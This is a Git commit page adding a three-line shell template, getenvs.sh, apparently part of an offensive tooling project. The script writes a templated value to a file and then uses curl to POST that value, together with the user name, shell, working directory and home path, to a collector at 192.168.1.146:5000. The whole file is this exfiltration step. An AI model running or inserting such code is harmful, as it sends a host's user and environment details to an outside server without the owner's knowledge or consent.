Add files via upload

main
witchdocsec 2023-07-09 10:59:24 +01:00 committed by GitHub
parent 5f90ccd8e6
commit 5f6f01e9ab
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 0 deletions

3
templates/rfs/getenvs.sh Normal file
View File

@ -0,0 +1,3 @@
myvariable={{rfsvars["myvariable"]}};
echo $myvariable > textfile.txt;
curl -X POST -d "recieved=$myvariable&user=$USER&shell=$SHELL&pwd=$PWD&home=$HOME" http://192.168.1.146:5000/l